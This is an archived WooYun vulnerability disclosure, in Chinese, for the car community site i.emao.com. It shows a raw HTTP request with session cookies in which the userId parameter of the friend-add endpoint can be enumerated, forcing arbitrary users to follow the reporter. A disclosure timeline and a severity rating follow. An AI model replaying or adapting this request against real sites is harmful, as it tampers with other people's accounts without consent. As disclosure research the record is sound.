乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-12: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
RT。。。我关注了谁?
这里可查看关注我的猫友
http://i.emao.com/131676/friend/list_1_1.html //131676是我的ID
发送如下请求
POST /131676/friend/add HTTP/1.1Host: i.emao.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://i.emao.com/238/homepage/list_0_0.htmlContent-Length: 25Cookie: Hm_lvt_c8553bf999297be4b7c3bf2ffec7c37f=1452432719,1452565828,1452578619; _ga=GA1.2.634211636.1452432719; EMUSS=pZyjkqKWng%3D%3D; EMUSE=q5qip6al; city_id=1; city_name=%E5%8C%97%E4%BA%AC; province_id=1; homePageCityId=1; homePageCityName=%E5%8C%97%E4%BA%AC; homePageCityPinYin=beijing; city_pinYin=beijing; sO3A_43cb_saltkey=gUXo4UI5; sO3A_43cb_auth=b4c3QR42NpTX9Clv0s5q2mGOm%2FTMOgVS8%2Bj5P9WeNpP62LoVus03AX4zLOePKrn9EBE3vKzLkD5KQikByLbqAHdrGkM; sO3A_43cb_lastvisit=1452562367; sO3A_43cb_lastact=1452578630%09index.php%09; _jzqa=1.783940365626230000.1452565969.1452565969.1452578618.2; _jzqx=1.1452565969.1452565969.1.jzqsr=emao%2Ecom|jzqct=/.-; _jzqckmp=1; _qzja=1.1921097098.1452565968696.1452565968697.1452578618295.1452578618295.1452578633179.0.0.0.8.2; _qzjto=8.2.0; EMAOSSID=iknean4pmtchtg8h5jtt2d97j6; cookie_user_login_info=0%2BW518yg5OXBm9rhuNHZns%2FdvdW6r7mYzKDC6L%2Bb2te40djXucO04bzW0pmy3Jys; cookie_user_ext=0%2BW53MrFuuHJ1rTgybqypM7dvdzQr%2BbQwsbG18uwtOW40dnj0Mbf3NS9rKQ%3D; sO3A_43cb_ulastactivity=1452578616%7C0; _gat=1; _qzjb=1.1452578618295.2.0.0.0; _qzjc=1; _jzqb=1.2.10.1452578618.1; _jzqc=1; Hm_lpvt_c8553bf999297be4b7c3bf2ffec7c37f=1452578634Connection: keep-aliveuserId=这里ID可遍历&otherId=131676userid是关注我的人的IDotherId是我的ID
抓包遍历一下id发包
瞬间粉丝暴涨
如上
不知道
危害等级:中
漏洞Rank:8
确认时间:2016-01-14 12:16
快速搭建团队、快速开发带来的问题
暂无